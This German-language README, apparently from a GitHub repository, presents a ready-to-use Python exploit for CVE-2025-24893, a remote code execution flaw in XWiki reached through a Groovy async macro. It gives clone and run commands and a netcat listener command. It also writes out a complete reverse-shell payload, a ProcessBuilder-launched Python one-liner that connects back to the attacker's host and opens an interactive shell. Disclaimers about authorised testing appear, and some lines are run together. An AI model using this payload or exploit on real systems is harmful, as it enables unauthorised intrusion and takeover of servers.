
Modified exploit for CVE-2025-24893
Ein einfaches Python3-Skript zur Ausnutzung von CVE-2025-24893, einer Remote-Code-Ausführung-Sicherheitslücke in der XWiki-Plattform, unter Verwendung eines Groovy-basierten async-Makros und einer konfigurierbaren Reverse-Shell-Payload.
⚠️ WARNUNG: Dieses Tool wird nur für Bildungszwecke und autorisierte Tests bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
ProcessBuilder-Snippet, um die Eigenheiten von Runtime.exec zu vermeidenrequests-Bibliothekpip install requests
Klonen Sie dieses Repository:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN> Der XWiki-Host (z. B. wiki.example.local).
<LHOST> Die IP Ihres Angreiferrechners (wo Ihr Listener läuft).
<LPORT> Ihr Listener-Port (Ganzzahl).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat-Listener auf eine Shell.Vor dem Senden der Payload führt das Skript Folgendes aus:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN> zurück, falls HTTPS fehlschlägtDies hilft, die Kompatibilität mit gemischten Protokollbereitstellungen sicherzustellen.
Standardmäßig verwendet das Skript einen Python3-Einzeiler:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload()-Funktion ändern, wenn Sie eine andere Shell benötigen (z. B. Bash, Perl, PHP usw.).Dieses Projekt ist unter der MIT-Lizenz lizenziert. Weitere Details finden Sie in der LICENSE-Datei.
Dieses Tool ist ausschließlich für autorisierte Sicherheitsbewertungen und Bildungszwecke bestimmt. Die Autoren übernehmen keine Verantwortung für Missbrauch. Holen Sie stets eine ausdrückliche Genehmigung ein, bevor Sie Zielsysteme testen.